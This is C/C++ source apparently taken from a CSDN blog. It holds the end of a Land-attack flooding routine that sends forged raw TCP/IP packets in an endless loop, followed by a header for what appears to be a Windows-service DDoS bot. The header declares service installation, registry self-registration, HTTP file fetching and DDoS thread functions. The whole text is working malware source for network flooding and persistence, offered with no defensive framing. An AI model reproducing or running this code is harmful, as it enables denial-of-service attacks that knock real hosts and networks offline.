memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=Landchecksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
while(1){
//Sleep(10);//800
Sleep(15); //500
for(int i=0;i<10;i++)
{
Land=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),
0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (Land==SOCKET_ERROR)
{
//printf("Land error:%d/n",WSAGetLastError());
return -4;
}
}
}//end while
closesocket(sock);
WSACleanup();
return 0;
}
/***********************************************/
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=577161
#if !defined(AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_)
#define AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
#include "resource.h"
#include "winsock2.h"
#include "Ws2tcpip.h"
typedef struct tcphdr //tcp头
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;
typedef struct _iphdr //ip头
{
unsigned char h_verlen; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间TTL
unsigned char proto; //8位协议号(TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
struct //tcp伪头
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz; //置空
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;
typedef struct _clientpara
{
//SOCKET s;
char port[6];
char IP[32];
}CLIENTPARA;
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
void UninstallService();
unsigned long CALLBACK MainProc(LPVOID pParam);
int start();
void uninstall(void);
void RegMe(void);
DWORD WINAPI GetOS();
char* GetHttpFile(char url[]);
unsigned long CALLBACK SocketThreadProc(LPVOID pParam);
unsigned long CALLBACK DDOSFunction(LPVOID dParam);
USHORT checksum(USHORT *buffer,int size);
void Readme();
void SaveLogToFile(char *content);
USHORT Landchecksum(USHORT *buffer, int size);
unsigned long Landresolve(char *host);
unsigned long CALLBACK LandDDOSFunction(LPVOID dParam);
#endif // !defined(AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_)